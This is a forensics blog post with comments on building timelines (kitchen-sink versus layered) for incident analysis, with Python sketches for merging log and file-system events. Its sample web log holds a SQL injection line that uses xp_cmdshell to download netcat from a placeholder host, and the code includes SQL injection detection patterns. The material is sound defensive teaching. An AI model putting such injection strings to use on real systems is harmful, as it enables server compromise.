Friday, January 13, 2012

Timeline Analysis

The DoD Cybercrime Conference is approaching, and I've been doing some thinking about my topic, Timeline Analysis.  I'll be presenting on Wed morning, starting at 8:30am...I remember Cory Altheide saying at one point that all tech conferences should start no sooner than 1pm and run no later than 3:30pm, or something like that.  Cool idea.

So, anyway...I've been thinking about some of the things that I put into pretty much all of my timeline analysis presentations.  When it comes to creating timelines, IMHO there are essentially two "camps", or approaches.  One is what I call the "kitchen sink" approach, which is basically, "Give me everything and let me do the analysis."  The other is what I call the "layered" or "overlay" approach, in which the analyst is familiar with the system being analyzed and adds successive "layers" to the timeline.  When I had a chance to chat with Chad Tilbury at PFIC 2011, he recommended a hybrid of the two approaches...get everything, and then view the data a layer at a time, using something he referred to as a "zoom" capability.  This is something I think is completely within reach...but I digress.

One of the things I've heard folks say about using the "everything" or "kitchen sink" approach is that they'd rather have everything so that they can look at it all when they're conducting analysis, because that's how we find new things.  I completely agree with the "finding new things" part, and I think it's a great idea.  After all, one of the core, foundational ideas behind creating timelines is that they can provide a great deal of context to the events we're seeing, and generally speaking, the more data we have, the more context is likely to be available.  A file modification can be pretty meaningless, in and of itself...but if you are able to see other events going on "nearby", you'll begin to see what events led up to, and occurred immediately following, the file modification.  For example, you may see that the user launched IE, began browsing the web, requested a specific page, Java was launched, a file was created, and the file in question was modified...all of which provides a great deal of context.

That leads me to this question...if you're running a tool that someone else designed and put together, and you're just pushing a button or launching a command, how do you know that the tool got everything?  How do you know that what you're looking at in the output of the tool is, in fact, everything?

The reason I prefer the layered approach is that it's predicated on (a) fully understanding the goals of your examination, and (b) understanding the system that you're analyzing.  Because you understand your goals, you know what it is you're trying to achieve.  And because you understand the system you're analyzing...Windows XP, Windows 7, etc...you also understand how various aspects of the operating system interact and are interconnected.  As such, you're able to identify where there may be additional data, and either request or create your own tools for extracting the data that you need.  Yes, this approach is more manually-intensive than a more automated approach, but it does have its positive points.  For one, you'll know exactly what should be in the timeline, because you added it.

Alternatively, when talking to analysts about collecting data, the sense I most often get is that the general feeling is to "GET ALL THE THINGS!!" and then begin digging through the volumes of data to perform "analysis".  I had a case a while back that involved SQL injection, and I created a timeline using only the file system metadata and the SQL injection statements from the web server logs; adding everything else available (including user profile data) would have simply made the timeline too cumbersome and too confusing to analyze effectively.  I understood the goals of my exam (i.e., determine what the bad guy did and/or was able to access), and I understood the system (in this case, how SQL injection works, particularly when the database and web server are on the same system).
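To make that layered approach a little more concrete, here's a minimal Python sketch that merges just two layers...file system metadata and web log requests that look like SQL injection...into one sorted timeline.  Everything here (the tuple layout, the log format, the SQLi patterns, the paths and timestamps) is a made-up simplification for illustration, not the output of any particular tool; a real bodyfile from TSK's fls, for instance, carries MACB flags, sizes, and more.

```python
import re
from datetime import datetime, timezone

# Layer 1: file system metadata as (epoch, source, description) tuples.
# These entries and timestamps are hypothetical.
fs_events = [
    (1326400215, "FILE", "c:/inetpub/scripts/nc.exe (created)"),
    (1326400260, "FILE", "c:/windows/system32/cmd.exe (accessed)"),
]

# Layer 2: web server log lines; keep only requests that look like SQLi.
# These patterns are illustrative, not exhaustive.
SQLI = re.compile(r"(xp_cmdshell|union[+\s]+select|;--)", re.IGNORECASE)

web_log = [
    "2012-01-12 20:29:00 GET /page.asp?id=1'+union+select+name+from+sysobjects;-- 200",
    "2012-01-12 20:30:00 GET /page.asp?id=1';exec+xp_cmdshell+'tftp+-i+1.2.3.4+GET+nc.exe';-- 200",
    "2012-01-12 20:31:00 GET /index.html 200",
]

def web_events(lines):
    """Yield (epoch, source, description) for SQLi-looking requests."""
    for line in lines:
        if SQLI.search(line):
            ts = datetime.strptime(line[:19], "%Y-%m-%d %H:%M:%S")
            yield (int(ts.replace(tzinfo=timezone.utc).timestamp()), "WEB", line[20:])

# Merge the layers and sort on the timestamp to build the timeline.
timeline = sorted(list(web_events(web_log)) + fs_events)
for epoch, source, desc in timeline:
    stamp = datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    print(stamp, source, desc)
```

The point of the sketch is that each layer is added deliberately, so you know exactly why every entry is there; adding a third layer (say, Event Log records) would just be another generator feeding the same merge-and-sort step.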

Now, some folks are going to say, "hey, but what if you missed something?"  To that I say...well, how would you know?  Or, what if you had the data available because you grabbed everything, and because you had no real knowledge of how the system acted, you had no idea that the event(s) you were looking at were important?

Something else to consider is this...what does it tell us when artifacts that we expect to see are not present?  Or...

The absence of an artifact where you would expect to find one is itself an artifact.

Sound familiar?  An example of this would be creating a timeline from an image acquired from a Windows system, and not seeing any indication of Prefetch file metadata in the timeline.  A closer look might reveal that there are no files ending in .pf in the timeline.  So...what does that tell you?  I'll leave that one to the reader...
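A check for that kind of absence can even be automated.  Here's a trivial sketch against a hypothetical timeline reduced to just file paths (a real timeline would carry timestamps, sources, and much more):

```python
# Hypothetical timeline entries, reduced to just the file path per event.
timeline_paths = [
    "c:/windows/system32/svchost.exe",
    "c:/users/admin/ntuser.dat",
    "c:/windows/prefetch/layout.ini",
]

# On XP/Vista/7 workstations, application Prefetch files (*.pf) are
# normally created as programs run; finding none at all is notable.
pf_entries = [p for p in timeline_paths if p.lower().endswith(".pf")]
if not pf_entries:
    print("NOTE: no *.pf files in timeline -- prefetch disabled, "
          "files deleted, or a server OS?")
```

The check doesn't answer the question...it just makes sure the analyst notices that the question needs to be asked.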

My point is that while there are (as I see it) two approaches to creating timelines, I'm not saying that one is better than the other...I'm not advocating one approach over another.  I know from experience that there are a lot of analysts who are not comfortable operating in the command line (the "dark place"), and as such, might not create a timeline to begin with, particularly not one that is pretty command-line-intensive.  I also know that there are a good number of folks who use log2timeline pretty regularly, but don't necessarily understand the complete set of data that it collects, or how it goes about doing so.

What I am saying is that, from my perspective, each has its own strengths and weaknesses, and it's up to the analyst how they want to approach creating timelines.  You may not want to use a manually-intensive approach (which you can easily automate using batch files, a la Corey Harrell's approach), but if you end up using a substantive framework, how do you know you're getting everything?


davnads said...

Harlan, great post. I expanded on some of your thoughts and shared my experience as it relates to the approaches you discussed in a blog response posted here:

I welcome your thoughts. At the end of the day, I see a need for a neutral review tool for timeline data to fill this gap.

H. Carvey said...

I don't follow...a "neutral review tool"?

Nick Klein said...

Thanks Harlan, it's always insightful to hear how skilled analysts tackle their work.

I wonder if your approach would differ if your tools were more powerful? For example, if you could very quickly add or remove layers, would you perform your analysis differently?

I mention this because we've been using Splunk for timeline analysis over the last year or so and find it quite powerful. I should add that I have nothing to do with the company or their product, I'm just a user. But I do find it very effective to start with the kitchen sink, then peel away layers to focus on the primary artefacts.

We once had a case where we examined unauthorised remote access and found some log entries showing errors on printer connection that at first appeared irrelevant. Then we realised that the remote computer was configured to redirect its local printers when making RDP connections, so these entries actually provided a way of fingerprinting the remote computer. A good example of how apparently irrelevant timeline entries can turn out to be gold.

I was keen to share the Splunk technique in case others found it useful. If you're interested there's a link on our blog:

Anonymous said...

My decision on which timeline analysis method (kitchen sink vs layered) to employ is dependent on the situation and my understanding of the methods employed by the attacker(s). Your SQL injection attack reference is a great example to build off in order to help me explain my logic.

Before choosing my timeline analysis method, I would begin analysis with a thorough review of web logs to determine the method of attack. Once I determine that a SQL injection attack was utilized, I group the attack into one of two buckets to help me determine how I want to approach my timeline analysis.

The first bucket is for the standard SQL injection attacks in which data is simply extracted from the database. From my experience, I know these attacks usually begin with the enumeration of table names and move on to the extraction of records from the database. The primary end goal of these attacks is extraction of records from the database - not the execution of shell commands and subsequent system ownership. From my experience, artifacts are therefore typically limited to a handful of sources from the system, such as the web and database logs. In these cases, I take a layered approach and only add those sources that are relevant.

The second bucket is for the more advanced SQL injection attacks in which the attack results in the execution of additional shell commands and/or interaction with the operating system. For instance, the xp_cmdshell stored procedure is exploited via SQL injection to execute code - resulting in the download of a netcat listener. The netcat listener is then used to obtain a reverse shell to the system. The end goal in these instances can vary substantially (foothold into the network, web code alteration, etc.), but in all cases we have the potential for subsequent interaction directly with the operating system. Given this scenario, the potential artifacts left by the attacker are not as limited because they possess OS-level access. Therefore in SQL injection cases involving potential OS-level access, I take the kitchen sink approach.
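The two buckets described above could be triaged with a rough pattern scan of the web logs before the timeline approach is chosen.  The signatures below are purely illustrative (real attacks vary widely, and information_schema, sysobjects, sp_oacreate, and xp_cmdshell are just common MSSQL/SQLi markers):

```python
import re

# Illustrative signatures only -- real attacks vary widely.
EXTRACTION = re.compile(r"(information_schema|sysobjects|union[+\s]+select)", re.I)
OS_LEVEL = re.compile(r"(xp_cmdshell|sp_oacreate|exec[+\s]+master)", re.I)

def triage(log_lines):
    """Return 'kitchen sink' if any request suggests OS-level access,
    'layered' if only data-extraction patterns appear, else None."""
    if any(OS_LEVEL.search(line) for line in log_lines):
        return "kitchen sink"
    if any(EXTRACTION.search(line) for line in log_lines):
        return "layered"
    return None

# Hypothetical log lines exercising the second (OS-level) bucket.
logs = [
    "GET /page.asp?id=1'+union+select+name+from+sysobjects;--",
    "GET /page.asp?id=1';exec+xp_cmdshell+'dir';--",
]
print(triage(logs))  # -> kitchen sink
```

Any hit in the OS-level bucket trumps the extraction-only bucket, mirroring the logic above: once OS-level access is in play, the artifact set is no longer limited to the web and database logs.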

Your statement, "...and I understood the system (in this case, how SQL injection works, particularly when the database and web server are on the same system).", is important to note. The approach I ultimately choose is case-dependent and based on how well I understand the methods utilized by the attacker(s).

H. Carvey said...


Thanks for the comment.

"...in SQL injection cases involving potential OS-level access, I take the kitchen sink approach."

In the example I used, the attack was similar to the OS-level access scenario you mentioned. Even so, there's relatively little value in dumping Registry data from all user accounts, because the attacker didn't log in as a user. In my case, everything that was done was done through the use of commands sent to the system via SQL injection; that, and the goals of my examination dictated the use of a limited, layered approach.

"The approach I ultimately choose is case-dependent and based on how well I understand the methods utilized by the attacker(s)."

My own personal opinion is to not hang my hat on understanding the attacker's method or trying to understand their goals. Instead, I try to "build a story" using my understanding of how the compromised system works and how the various components of that system interact. Even on a subverted system, this is a much more finite data set, and also allows an analyst to recognize when an artifact that should be there is absent.

Again, thanks for your great comment!